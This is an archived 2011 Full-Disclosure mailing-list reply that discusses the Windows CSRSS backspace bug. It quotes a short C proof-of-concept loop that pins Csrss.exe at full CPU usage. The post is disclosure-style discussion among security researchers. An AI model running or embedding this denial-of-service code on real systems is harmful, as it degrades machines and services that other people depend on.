[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- To: noloader@xxxxxxxxx
- Subject: Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- From: Christian Sciberras <uuf6429@xxxxxxxxx>
- Date: Sun, 12 Jun 2011 03:29:02 +0200
For those lazy enough to search:
https://www.owasp.org/index.php/The_CSRSS_Backspace_Bug_still_works_in_windows_2003_sp1
Excerpt:
Basicaly just compile this and you will get a 100% processor usage by the
compiled exploit and Csrss.exe
#include <stdio.h>
int main(void)
{
while(1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}
How this helps in sending spam is beyond me.
On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton <noloader@xxxxxxxxx> wrote:
> On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing Doom =- <secn3t@xxxxxxxxx>
> wrote:
>
> > It is now, over 1yr old atleast and exists in riched20.dll.
> > This PoC info is over for me also.
> Microsoft had problems with a backspace in the past. Search for "CSRSS
> Backspace Bug".
>
> > [SNIP
>
> Jeff
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- References:
- [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- From: Christian Sciberras
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- From: Christian Sciberras
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
- Re: [Full-disclosure] POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...